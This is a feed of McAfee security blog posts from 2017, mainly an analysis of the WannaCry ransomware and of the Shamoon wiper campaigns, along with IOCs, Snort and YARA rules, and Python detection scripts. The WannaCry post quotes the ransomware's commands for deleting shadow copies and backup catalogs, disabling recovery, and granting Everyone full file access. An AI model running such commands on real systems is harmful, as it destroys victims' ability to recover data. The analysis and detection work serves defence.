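    if btype == PUBLICKEYBLOB:
        return n  # modulus only
    # modulus, prime1, prime2, exponent1, exponent2, coefficient, privateExponent
    return 2 * n + 5 * (n // 2)


def expected_blob_len(btype: int, bitlen: int) -> int:
    """Total blob size CryptImportKey expects for this type and key size."""
    return HEADER_LEN + key_body_len(btype, bitlen)


def classify_dky(data: bytes) -> dict:
    """Return the kind of content: 'private_key', 'public_key' or 'message'."""
    if len(data) >= HEADER_LEN:
        btype, bver, _reserved, alg = BLOBHEADER.unpack_from(data, 0)
        magic, bitlen, pubexp = RSAPUBKEY.unpack_from(data, BLOBHEADER.size)
        type_ok = (btype, magic) in ((PUBLICKEYBLOB, b"RSA1"), (PRIVATEKEYBLOB, b"RSA2"))
        header_ok = (bver == CUR_BLOB_VERSION and alg == CALG_RSA_KEYX
                     and bitlen % 8 == 0 and bitlen >= 512)
        if type_ok and header_ok and len(data) == expected_blob_len(btype, bitlen):
            kind = "private_key" if btype == PRIVATEKEYBLOB else "public_key"
            return {"kind": kind, "bits": bitlen, "pubexp": pubexp}
    # Anything else is what the decryptor treats as text: CryptImportKey fails,
    # the file is deleted and the bytes are displayed to the user.
    return {"kind": "message", "text": data.decode("utf-8", errors="replace")}


def build_blob(btype: int, bitlen: int, pubexp: int = 65537, fill: bytes = b"\x42") -> bytes:
    """Construct a syntactically valid blob filled with dummy key material (no real key)."""
    magic = b"RSA1" if btype == PUBLICKEYBLOB else b"RSA2"
    return (BLOBHEADER.pack(btype, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
            + RSAPUBKEY.pack(magic, bitlen, pubexp)
            + fill * key_body_len(btype, bitlen))


if __name__ == "__main__":
    # Constructed samples: what a working back end would return versus the
    # kind of text reply victims actually received.
    for sample in (build_blob(PRIVATEKEYBLOB, 2048),
                   build_blob(PUBLICKEYBLOB, 2048),
                   b"Send your Bitcoin wallet address via the Contact Us form."):
        print(classify_dky(sample))
```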

Decryption does not work because the authors omitted a link between payment and the unique ID. But what happens if a user follows the instructions and sends the Bitcoin wallet ID to the attackers? Can the victim decrypt files? So far, a tiny sample of victims have reported the decryption of files, but this appears not to be tied to the payment-making function.

Although the message indicates that a user may be able to get the files back (which supports the theory of shoddy design), our limited testing indicated that decryption keys are not returned and files cannot be restored even after payment, which adds weight to the possibility that WannaCry is a prank or test.


Does WannaCry prevent recovery of file data?

Yes and no. There has been a lot of excellent research showing that in some circumstances, files are recoverable:

  • Files on removable and nonsystem volumes.
  • Read-only files.
  • Temporary files.

Files stored in the Desktop and Documents folders are the hardest to recover. What does this mean for our theories? Both are still supported:

  • Developer incompetence: Incorrectly deleting and overwriting original files indicates a hurried or poor engineer.
    • There is a difference between not realizing that per-user file decryption can never work without the unique ID and running into filesystem processing bugs for large batch operations; errors in batch processing are much easier to explain.
  • Prank: The techniques for preventing recovery support the theory that the developers did not go to great lengths to prevent recovery from unpredictable folders and devices:
    • Removable, network, and fixed nonsystem volumes may support file carving as a recovery technique. This is also true for devices that make use of wear leveling.
    • Online storage folders and some versioning tools may provide alternative recovery mechanisms for files.
    • Desktop and Documents folders are common file locations. Many users would not be able to recover most of their files.

We do not believe that WannaCry file data recovery prevention strongly supports either thesis.


Does WannaCry prevent recovery of key material?

The most important key for data recovery is the user’s private key. We used hardware breakpoints to see what happens to the exported key blob in our earlier example, as shown below:

Figure 24: Hardware breakpoint to trigger on writes to the key blob.

When this breakpoint fires, we found the following code zeroing out the exported key blob:

Figure 25: Assembly of code that modifies the exported key blob.

Thanks to care taken with data sanitization (such as that shown in Figure 25) and the correct use of CryptDestroyKey, WannaCry keeps the user’s private key in a nonencrypted form for the shortest possible time. Thus private key recovery is impractical beyond exploiting issues in the Windows APIs (as described by other authors).

Although the attacker’s motive may remain unknown for some time, we commend the response from victims, who have generally decided to not pay. Our research continues into this campaign; we will release more data as more information arises.

An Analysis of the WannaCry Ransomware Outbreak https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/analysis-wannacry-ransomware-outbreak/ Fri, 12 May 2017 22:07:01 +0000

The post An Analysis of the WannaCry Ransomware Outbreak appeared first on McAfee Blogs.

Charles McFarland was a coauthor of this blog.

Over the course of Friday, May 12 we received multiple reports of organizations across multiple verticals falling victim to a ransomware attack. By Friday afternoon, McAfee’s Global Threat Intelligence system had been updated to identify all known WannaCry samples and the company had delivered DAT signature updates to all its customers. But the wave of attacks ranks as one of the most notable cyber events in history.

Once infected, the encrypted files contain the file extension .WNCRYT. Victims’ computers then proceed to display the following message with a demand for $300 to decrypt the files.

Observations

Exploit MS17-010:

The malware uses the MS17-010 exploit to distribute itself. This is an SMB vulnerability with remote code execution options. Details at https://technet.microsoft.com/en-us/library/security/ms17-010.aspx . Exploit code is available on multiple sites, including this example: https://github.com/RiskSense-Ops/MS17-010/blob/master/exploits/eternalblue/ms17_010_eternalblue.rb.

This exploit is also known as the Equation Group’s ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers a couple of weeks ago.

With MS17-010, the attacker can use just one exploit to get remote access with system privileges, meaning both steps (Remote Code Execution + Local Privilege Escalation combined) use just one bug in the SMB protocol. Analyzing the exploit code in Metasploit, a popular hacking tool, we see the exploit uses KI_USER_SHARED_DATA, which has a fixed memory address (0xffdff000 on 32-bit Windows), to copy the payload and transfer control to it later.

Because the exploit gives remote control of a victim’s PC with system privileges and without any user action, an attacker who controls a single system inside a local network can use it to spread the malware to every other system on that network that is affected by the vulnerability and has not been patched for MS17-010.

Behavior

Using the following command line, the malware removes Volume Shadow copies and backups:

Cmd /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

File size of the ransomware is 3.4MB (3514368 bytes).

The authors called the ransomware WANNACRY; the string is hardcoded in the samples.

The ransomware writes itself into a randomly named folder under ProgramData with the filename tasksche.exe, or into the C:\Windows\ folder with the filenames mssecsvc.exe and tasksche.exe.

Examples

  • C:\ProgramData\lygekvkj256\tasksche.exe
  • C:\ProgramData\pepauehfflzjjtl340\tasksche.exe
  • C:\ProgramData\utehtftufqpkr106\tasksche.exe
  • c:\programdata\yeznwdibwunjq522\tasksche.exe
  • C:\ProgramData\uvlozcijuhd698\tasksche.exe
  • C:\ProgramData\pjnkzipwuf715\tasksche.exe
  • C:\ProgramData\qjrtialad472\tasksche.exe
  • c:\programdata\cpmliyxlejnh908\tasksche.exe

The ransomware grants full access to all files by using the command:

Icacls . /grant Everyone:F /T /C /Q
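The host-side behaviours listed above (shadow-copy and backup-catalog deletion, disabled recovery, the icacls grant to Everyone, tasksche.exe dropped in a random ProgramData folder and the 15-digit .bat helper) are the kind of thing a process-creation log will show before the ransom note appears. The following added example is not McAfee's code; it runs simple detection rules over constructed Sysmon/4688-style records in an assumed "timestamp|host|image|command line" format, and any real deployment would adapt the parsing to its own log schema.

```python
"""Flag WannaCry-style host behaviours in process-creation logs.

Added example (not McAfee's code). The log lines are constructed for the
example and use an assumed pipe-separated layout: timestamp|host|image|cmdline.
"""
import re

# Rules over the command line, taken from the commands quoted in the post.
COMMAND_RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("recovery_disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+"
                r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("backup_catalog_deletion", re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("everyone_full_control",
     re.compile(r"icacls\s+\.\s+/grant\s+Everyone:F\s+/T\s+/C\s+/Q", re.I)),
    # 15-digit batch helper, e.g. 176641494574290.bat ([0-9]{15}.bat in the filename list)
    ("numeric_batch_file", re.compile(r"(^|[\\\s])\d{15}\.bat\b", re.I)),
]

# Rules over the process image, from the "Examples" and "Filenames" sections.
IMAGE_RULES = [
    ("tasksche_programdata",
     re.compile(r"^[a-z]:\\programdata\\[a-z]+\d+\\tasksche\.exe$", re.I)),
    ("dropper_in_windows", re.compile(r"^[a-z]:\\windows\\(mssecsvc|tasksche)\.exe$", re.I)),
]

# Constructed sample log: one infected workstation plus benign noise.
SAMPLE_LOG = r"""
2017-05-12T10:01:03Z|WS-0042|C:\ProgramData\lygekvkj256\tasksche.exe|tasksche.exe /i
2017-05-12T10:01:04Z|WS-0042|C:\Windows\System32\cmd.exe|cmd /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
2017-05-12T10:01:05Z|WS-0042|C:\Windows\System32\icacls.exe|icacls . /grant Everyone:F /T /C /Q
2017-05-12T10:01:06Z|WS-0042|C:\Windows\System32\cmd.exe|cmd /c 176641494574290.bat
2017-05-12T10:02:00Z|WS-0042|C:\Windows\System32\vssadmin.exe|vssadmin list shadows
2017-05-12T10:03:00Z|WS-0017|C:\Program Files\Backup\agent.exe|agent.exe --snapshot
"""


def scan_events(log_text: str) -> list:
    """Return [(host, image, [matched rule names])] for every event that matches a rule."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue  # blank or malformed record
        _ts, host, image, cmdline = parts
        names = [name for name, rx in IMAGE_RULES if rx.search(image)]
        names += [name for name, rx in COMMAND_RULES if rx.search(cmdline)]
        if names:
            hits.append((host, image, names))
    return hits


def host_behaviours(hits: list, host: str) -> list:
    """Distinct behaviours seen on one host; several together is a strong signal,
    a single one (e.g. an admin running vssadmin) usually is not."""
    return sorted({name for h, _image, names in hits if h == host for name in names})


if __name__ == "__main__":
    found = scan_events(SAMPLE_LOG)
    for host, image, names in found:
        print(host, image, names)
    print("WS-0042:", host_behaviours(found, "WS-0042"))
```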


Using a batch script for operations:

176641494574290.bat 


Content of batch file (fefe6b30d0819f1a1775e14730a10e0e):

echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut("C:\@WanaDecryptor@.exe.lnk")>> m.vbs
echo om.TargetPath = "C:\@WanaDecryptor@.exe">> m.vbs
echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs
del /a %0

Content of M.vbs:

SET ow = WScript.CreateObject("WScript.Shell")
SET om = ow.CreateShortcut("C:\@WanaDecryptor@.exe.lnk")
om.TargetPath = "C:\@WanaDecryptor@.exe"
om.Save

Indicators of compromise

Hashes


IP Addresses


Domains


Filenames

  • @Please_Read_Me@.txt
  • @WanaDecryptor@.exe
  • @WanaDecryptor@.exe.lnk
  • Please Read Me!.txt (Older variant)
  • C:\WINDOWS\tasksche.exe
  • C:\WINDOWS\qeriuwjhrf
  • 131181494299235.bat
  • 176641494574290.bat
  • 217201494590800.bat
  • [0-9]{15}.bat #regex
  • !WannaDecryptor!.exe.lnk
  • 00000000.pky
  • 00000000.eky
  • 00000000.res
  • C:\WINDOWS\system32\taskdl.exe


Bitcoin Wallets

  • 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
  • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
  • 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Here is a Snort rule submitted to SANS by Marco Novak:

alert tcp $HOME_NET 445 -> any any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response"; flow:from_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:2;)

And other SNORT rules from Emerging Threats:

(http://docs.emergingthreats.net/bin/view/Main/2024218)

alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Request (set)"; flow:to_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)

alert smb $HOME_NET any -> any any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response"; flow:from_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:1;)

Yara:

rule wannacry_1 : ransom
{
    meta:
        author = "Joshua Cannell"
        description = "WannaCry Ransomware strings"
        weight = 100
        date = "2017-05-12"

    strings:
        $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
        $s2 = "Wanna Decryptor" wide ascii nocase
        $s3 = ".wcry" wide ascii nocase
        $s4 = "WANNACRY" wide ascii nocase
        $s5 = "WANACRY!" wide ascii nocase
        $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase

    condition:
        any of them
}

rule wannacry_2
{
    meta:
        author = "Harold Ogden"
        description = "WannaCry Ransomware Strings"
        date = "2017-05-12"
        weight = 100

    strings:
        $string1 = "msg/m_bulgarian.wnry"
        $string2 = "msg/m_chinese (simplified).wnry"
        $string3 = "msg/m_chinese (traditional).wnry"
        $string4 = "msg/m_croatian.wnry"
        $string5 = "msg/m_czech.wnry"
        $string6 = "msg/m_danish.wnry"
        $string7 = "msg/m_dutch.wnry"
        $string8 = "msg/m_english.wnry"
        $string9 = "msg/m_filipino.wnry"
        $string10 = "msg/m_finnish.wnry"
        $string11 = "msg/m_french.wnry"
        $string12 = "msg/m_german.wnry"
        $string13 = "msg/m_greek.wnry"
        $string14 = "msg/m_indonesian.wnry"
        $string15 = "msg/m_italian.wnry"
        $string16 = "msg/m_japanese.wnry"
        $string17 = "msg/m_korean.wnry"
        $string18 = "msg/m_latvian.wnry"
        $string19 = "msg/m_norwegian.wnry"
        $string20 = "msg/m_polish.wnry"
        $string21 = "msg/m_portuguese.wnry"
        $string22 = "msg/m_romanian.wnry"
        $string23 = "msg/m_russian.wnry"
        $string24 = "msg/m_slovak.wnry"
        $string25 = "msg/m_spanish.wnry"
        $string26 = "msg/m_swedish.wnry"
        $string27 = "msg/m_turkish.wnry"
        $string28 = "msg/m_vietnamese.wnry"

    condition:
        any of ($string*)
}


McAfee urges all its customers to ensure McAfee’s DAT updates have been applied to ensure the latest protection. We furthermore advise customers to be diligent in applying security updates for all the software solutions they use.

For more information on McAfee’s response to WannaCry, please read this Knowledge Center article.

CIOs: You need to have the cloud talk with your staff https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/cios-need-cloud-talk-staff/ Mon, 08 May 2017 16:15:23 +0000

The post CIOs: You need to have the cloud talk with your staff appeared first on McAfee Blogs.

]]>
CIOs, it is time to have a frank and open discussion with your staff. This conversation may be difficult or awkward, as it involves topics such as consent, privacy, and appropriate protection. Yes, you need to speak with your staff about the organization’s cloud strategy, and any deployment or security issues that they are facing.

Cloud First strategies are predominantly driven from the top down, per McAfee’s 2017 cloud adoption and security report. However, for many of the organizations involved in the study, there appears to be a slight disconnect between the C-suite and staff. Overall, C-level executives, such as CIOs, CSOs, and CISOs, displayed a more positive attitude towards cloud-based operations than the non-executive respondents.

Within your organization, it is important to uncover any gaps in perception and determine what is causing them. Are the reasons for a Cloud First strategy not being clearly communicated down the chain? Are your staff seeing operational issues that are not making it to your office? Or are your staff concerned that cloud adoption is putting their jobs at risk?

The McAfee 2017 cloud study provides some valuable clues and discussion points for your staff meeting. Based on the survey results, 92% of execs stated that they are following a Cloud First strategy, but only 80% of staff agreed. There were also significant gaps in the number and types of cloud services in use, amount of sensitive data stored in the cloud, and plans for future cloud investments. An organization-wide inventory of cloud services in use, data types and locations, and budgets would be an excellent way to start the meeting. The results of this inventory will likely surprise most people in the room, and form the foundation for a discussion of operational and staffing concerns.

According to the survey, the biggest gaps in operational concerns between staff and executives relate to costs, compliance, unauthorized access, and Shadow IT. Staff were more concerned about costs than executives, which may be directly related to the lack of information about budget plans mentioned above. However, staff were also more concerned than the execs about unauthorized access to sensitive data and about their ability to maintain compliance with regulations. These concerns should be the focus of a deep dive across the organization, to identify whether there are significant gaps in security and privacy controls. At the same time, executives were more concerned about Shadow IT than staff. When Shadow IT apps are found, staff were more likely to favor blocking access to unauthorized applications, while execs preferred data loss prevention tools. Depending on the results of your discussion, clear communication throughout the organization about the risks and consequences of Shadow IT appears to be needed.

Finally, staff may feel that they lack the necessary job skills for a Cloud First IT department. Over half of the executives reported that they have slowed their cloud adoption due to a skills shortage, and almost a third reported that they are continuing despite a skills shortage. However, the execs ranked this concern lower than staff did, which may be inadvertently sending the message down the chain that staffing changes are coming. Based on earlier research from McAfee, it is easier and more effective to invest in security training for existing staff than to find and hire experienced security professionals.

The transformation to cloud services is having a significant impact on the efficiency and effectiveness of organizations of all sizes, and the IT department is probably impacted more than most. Based on the results of this study, there are some small but possibly significant gaps between C-level executives and their staff, that should be addressed before they impact the organization’s security posture.

For more details on cloud adoption and security, download the 2017 McAfee cloud report, Building Trust in a Cloudy Sky.

The post CIOs: You need to have the cloud talk with your staff appeared first on McAfee Blogs.

The State of Shamoon: Same Actor, Different Lines
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/state-shamoon-actor-different-lines/
Wed, 26 Apr 2017 05:01:39 +0000
Naming the recent data-wiping attacks in Saudi Arabia as a continuation of the Shamoon campaign suggests that we are dealing with identical malware and procedures. However, there are fundamental differences between the campaigns of 2012 and 2016‒17, and these differences provide a fascinating insight into the development process of the attackers.

When we look at this campaign from a high level (preceding image) and at the shared characteristics (in red), we find quite a lot in common. Let’s examine in more detail:

When we look more closely into the phases of the cyberattack “kill chain,” and their modus operandi, we see differences that lead to more questions, as well as interesting findings.

Reconnaissance

In the reconnaissance phase of the 2012 attacks, the adversaries used scanning tools and a pirated copy of penetration-testing software Acunetix Security Scanner to find possible vulnerabilities on the victims’ outward-facing servers. An example of this scanning follows in an excerpt from an intrusion detection system log:

After finding a possible exploit, the adversaries uploaded web shells to gain remote access and used the web shells’ functionality to harvest usernames and credentials.

In analyzing attacks, we look at the capabilities and skills actors use. In examining how well an adversary knows its target and infrastructure, we classify this type of noisy scanning and hoping for an exploit as novice behavior. The attacker is hoping for a lucky shot instead of gathering detailed information during the reconnaissance phase.

In the 2016 attack, the reconnaissance phase consisted of spear-phishing attacks, with well-prepared spoofed domains and documents falsified to appear to come from certain trustworthy corporate and public-sector organizations. These documents were weaponized with malicious macros to download and execute a variety of backdoor threats. From 2012 we know publicly of two major attacks on victims in the petrochemical industry. In 2016‒17 the attacks were focused on multiple sectors, including public, petrochemical, and finance, but were intended to disrupt a single country: Saudi Arabia.

Weaponization

Once the adversaries had gathered the credentials needed to weaponize the wiper malware component, they generally used accounts that would give the right amount of privileges to spread the malware as far as possible through the network. One interesting difference was that in the 2012 case the attackers also inserted default credentials of industrial control systems (ICS) equipment. Clearly the attack was aimed not only at the victims’ office networks but also attempted to disrupt the ICS environments.

In both cases, when the hardcoded date was reached, the wiper started to erase the disks. In 2012 the wiped machines reported to an internal control server that the destruction was a success. In the 2016 Shamoon samples, we found a control server component but to our knowledge it was not used to track the status of destruction.

In one URL parameter (also mentioned by our peers in the industry analyzing this campaign) we find an interesting word:

GET hxxp://server/category/page.php?shinu=ja1p9/

The word shinu can be translated to “what?” in Persian Gulf Arabic slang or “listen” in Farsi.
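A single request like the one above is most useful once it is turned into a check that can be run over proxy logs. The script below is an added example written for this post (not McAfee's code): it parses constructed proxy-log lines in an assumed "timestamp client method url" layout, re-fangs `hxxp://` URLs, and flags any request whose query string carries the `shinu` parameter quoted above; a request to the quoted path `/category/page.php` without the parameter is reported separately as a weaker signal, since that path is generic. The log lines, client addresses, and hostnames other than `server` are made up.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the request quoted above: the query-parameter name
# "shinu" (strong signal) and the request path it was seen on (weak signal).
INDICATOR_PARAMS = {"shinu"}
INDICATOR_PATHS = {"/category/page.php"}

# Constructed proxy-log lines in an assumed "timestamp client method url"
# layout; adapt the field split to the real proxy's format.
SAMPLE_LOG = """\
2016-11-17T20:40:01Z 10.0.5.23 GET http://server/category/page.php?shinu=ja1p9/
2016-11-17T20:40:02Z 10.0.5.23 GET http://intranet.example/news/index.html
2016-11-17T20:40:03Z 10.0.7.9 POST http://cdn.example/category/page.php?id=42
2016-11-17T20:40:04Z 10.0.9.4 GET http://other.example/x.php?lang=en&shinu=abc
2016-11-17T20:40:05Z 10.0.9.4 GET http://other.example/x.php?shinuX=abc
"""


def refang(url: str) -> str:
    """Turn a defanged URL (hxxp:// or hxxps://) back into a parseable one."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def classify_request(url: str) -> List[str]:
    """Return the indicator reasons that apply to url (empty list if none)."""
    parts = urlsplit(refang(url))
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = [f"param:{name}={params[name][0]}"
               for name in sorted(INDICATOR_PARAMS & set(params))]
    if parts.path in INDICATOR_PATHS:
        reasons.append(f"path:{parts.path}")
    return reasons


def suspicious_requests(log_text: str) -> List[Dict[str, str]]:
    """Parse each log line and keep those whose URL matches an indicator."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # malformed line: skip rather than abort the sweep
        ts, client, method, url = fields
        reasons = classify_request(url)
        if reasons:
            findings.append({"time": ts, "client": client, "method": method,
                             "url": url, "reasons": ";".join(reasons)})
    return findings


if __name__ == "__main__":
    for f in suspicious_requests(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['method']} {f['url']}  <- {f['reasons']}")
```

Keying on the parameter name rather than the full URL lets the check survive the server host changing, which it will; the path-only hits are there to be corroborated against the parameter hits from the same client, not to be escalated on their own.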

Until now we have compared the 2012 and 2016‒17 attacks. During our investigation and those by our peers in the industry, we have discovered many links to other campaigns that used the same domains, whois registrants, or code. One example we found was the reuse of code and exploits used in an attack by the Rocket Kitten group in spring 2016 and their reappearance in the 2016 Shamoon attacks.

A code excerpt from a macro used by Rocket Kitten since spring 2016:

A code excerpt from a macro used in a spear-phishing attack by Shamoon in 2016:

Our peers mentioned some other artifacts that referred to the OilRig campaign, in which Saudi Arabian organizations were targeted using Excel documents that included macros. The macros’ VBS code ran PowerShell and communicated via DNS tunneling.

From an operational security perspective—“How well do the attackers hide details or information about themselves?”—we gave them a low score in both campaigns. We did see some deliberate manipulation: for example, the resource language in the 2016 wiper was Yemeni Arabic (likely a reference to the political conflict in the region), and the “wiping picture” was a photo of the dead Syrian boy on the beach. Still, plenty of information was left behind, for example, the reuse of infrastructure and code, as well as program database paths in the malware that would normally be removed.

From a risk-analysis perspective, we would give the 2012 adversaries a certain score based on factors such as stealth, operational security, and precision. If we were to do the same for the 2016‒2017 attacks, we would award a higher score. For example, the attack precision increased due to the use of spear phishing with payloads instead of noisy scanning and web shells. Also, the time of persistence in the networks increased compared with that of the 2012 attacks.

Due to the large scale of the attack in 2016‒2017, we saw mistakes in maintaining operational security. We strongly believe that this was caused by the involvement of different groups/individuals with different skills, whereas in 2012 we believe one group was responsible for the attack.

Development cycle

With five years between the attacks, we have likely seen a nation-state actor grow in cyber-offensive capacity and skills. Where once pirated software was used for vulnerability scanning, which can be easily detected by intrusion detection or prevention systems, we now find targeted spear phishing with weaponized documents. And instead of batch scripts, the use of PowerShell scripts and DNS tunneling demonstrates a major increase in the attackers’ expertise.

Note: We wish to acknowledge the efforts of McAfee’s Advanced Programs Group for that team’s extensive contributions to the actor and adversary part of this research.

Want more information? Check out the Q&A or Summary Blog on this topic, and follow us on Twitter @McAfee.

The post The State of Shamoon: Same Actor, Different Lines appeared first on McAfee Blogs.

Shamoon Returns, Bigger and Badder
https://securingtomorrow.mcafee.com/business/shamoon-returns-bigger-badder/
Wed, 26 Apr 2017 05:01:26 +0000
In November 2016, we published a blog that drew comparisons between samples we had received and those of the 2012 ‘Shamoon’ campaign. Since November, there has been a considerable amount of research corroborating our initial assertions, which we have reviewed against our own continuing analysis. We found that the latest Shamoon campaigns are attacking a wider range of organizations, that they are connected to other notable campaigns, and that the increase in sophistication suggests investment, collaboration and coordination beyond that of a single hacker group: rather, the comprehensive operation of a nation-state. This blog, and the technical details (also now published), are a summary of our continued research into the comparison and growth of the attacks from 2012 – 2017.

A wider group of targets 

In the original campaign, the targets were predominantly focused on the energy sector within Saudi Arabia. In the current instance, we have evidence that the scope of targeted verticals has widened from energy to the public sector, financial services, and others. Although the scope of targets has widened, all the samples we received targeted organizations in Saudi Arabia.

The approach taken by the attackers was all too familiar: once a target was identified, they used spear phishing email as the initial entry vector. From as far back as September 2016, the attackers sent these emails to individuals within target organizations. The messages contained Microsoft Office files embedded with macros, which facilitated back-door access to the organizations. With the necessary reconnaissance concluded, the actors initiated the weaponization of the attack with the intention of disrupting key organizations across Saudi Arabia:

  • Attack Wave 1: Wipe systems on November 17, 2016, at 20:45 Saudi time.
  • Attack Wave 2: Wipe systems on November 29, 2016, at 01:30 Saudi time.
  • Attack Wave 3: Began January 23, 2017, and ongoing, with similar samples, methods, and TTPs as in Waves 1 and 2.

The process of wiping infected systems loaded a different image from the original campaign, but with the same devastating effect. The scale of the attack—with multiple waves of attacks—suggests a coordinated effort to disrupt a nation, which is new compared with the previous campaign.

Links to other campaigns

The linkage to the previous campaign was based on the fact that much of the code was the same; indeed, our assessment concluded that there was a 90% reuse of code from the 2012 attacks. However, our examination of this reuse of code led us to identify code from other attack campaigns. For example, code used in the macros from the latest spear-phishing campaign was seen in attacks conducted by the Rocket Kitten hacking group, and we identified the infrastructure used as that of the OilRig campaign.

Although the current attackers may have connections with a particular nation-state, our analysis focused on the notable increase in the technical expertise since the 2012 campaign. For example, in 2012, the actors moved quickly in and out of the victim network, inflicting system-wipe damage and then disappearing. In 2016, the actors penetrated networks and established remote control to gather intelligence for future planned wiping attacks.

A broader community of collaborators

Based on these and other key differences, we strongly believe that the 2016-17 campaigns benefitted from the development effort of a much wider community of collaborating hacking groups. The recent attacks demonstrate greater technical expertise, yet the wide-ranging nature of the campaign involved many other actors that did not necessarily have the same level of technical expertise as other participants. Poor Operational Security procedures suggest that some parts of the attacks were executed by less experienced operators. Furthermore, it is true that malware can be designed to contain indicators that attribute their attacks to other actors.

Based on our years of investigation into the Shamoon attacks, we do not believe this misdirection tactic was used in the cases we examined.

Though we can argue about the term “sophistication,” one thing is clear. This campaign was significantly larger, well-planned, and an intentional attempt to disrupt key organizations and the country of Saudi Arabia.

Attacks on banks in East Asia and on corporations remind us that cyber espionage and system-wiping campaigns are not unique to the Middle East. Rogue state and stateless actors have been known to use similar cyber tools and tactics to achieve military and intelligence objectives they would otherwise be unable to accomplish. Actors such as these have been known to obtain these and other technologies from the black market, if not from each other directly.

To that end, there is no indication that the attackers will not come back again, and, as this latest Shamoon ‘reboot’ has shown, they will come back bigger and stronger again, and again.

Note: We wish to acknowledge the efforts of McAfee’s Advanced Programs Group for that team’s extensive contributions to the actor and adversary part of this research.

For details on this research, please see the McAfee Strategic Intelligence technical blog in Executive Perspectives.

Want even more information? Check out the Q&A blog on this topic and follow us on Twitter @McAfee.

The post Shamoon Returns, Bigger and Badder appeared first on McAfee Blogs.

Remaining True in the Face of Incredible Responsibility
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/remaining-true-face-incredible-responsibility/
Wed, 05 Apr 2017 15:00:40 +0000
By now you’ve heard the news: Intel Security has officially rebranded to McAfee. But even though our company name has changed, our values and mission continue to endure: our focus remains on educating our customers through valuable content, collaborating within the industry to share intelligence, and leading in security initiatives and innovations. Ultimately, we’re dedicated to not just maintaining, but bettering, what makes us who we are, as we face the most diverse and advanced threat landscape we’ve ever seen.

Creating Valuable Content

Unfortunately, public understanding of cybersecurity as a whole is still lacking. Why? For starters, whenever there’s a major breach, the conversation is focused on the malware behind it, not the overall impact. So users are left asking “so what?” thinking it has nothing to do with their daily lives.

It is clear that there is work to be done when it comes to addressing, analyzing, and educating the public on the current risks that exist in their digital lives. This is why we’re sharpening our own threat intelligence content, so that we can start answering the “so what?”

We want to address those issues in a valuable way. So, we’re looking to develop content that is both interesting and relevant. The good news is that with the new McAfee brand, you’re only going to see more of this, as we’re going to keep driving home content that communicates the what and the why, not just the how.

To accomplish this, we have a team of researchers dedicated to specific threats across different research categories. Ultimately, the responsibility of security firms goes beyond simply the provision of technology; we also need to articulate emerging risks to an audience that does not understand the value of information.

Sharing is Caring

But it is not just up to us. This is a responsibility that rests on the shoulders of the entire industry—and with the new McAfee, we compete by collaborating.

Efforts like the CTA (Cyber Threat Alliance) hold us all to this sense of shared responsibility, and with it we can hold our heads high. But it’s just the start. We will continue to push forward when it comes to openly releasing research, the recently released CHIPSEC framework being the most recent example, along with the decryption tools made available through the NoMoreRansom site and many others.

Staying True to Who We Are

Integrity is a core component of what we do as an industry, and what we do as a company. So no matter what next initiative or innovation we drive, we maintain integrity in everything we do.

It’s like we said before, our name may change, but our mission – and what guides that mission—doesn’t.

Follow us on @McAfee and join the conversation about the new company with #NewMcAfee

The post Remaining True in the Face of Incredible Responsibility appeared first on McAfee Blogs.

CHIPSEC Support Against Vault 7 Disclosure Scanning
https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/
Thu, 09 Mar 2017 07:09:36 +0000
Following recent WikiLeaks Vault 7 disclosures, including details regarding firmware vulnerabilities, there has been significant concern regarding the integrity of devices and operating systems used within society.

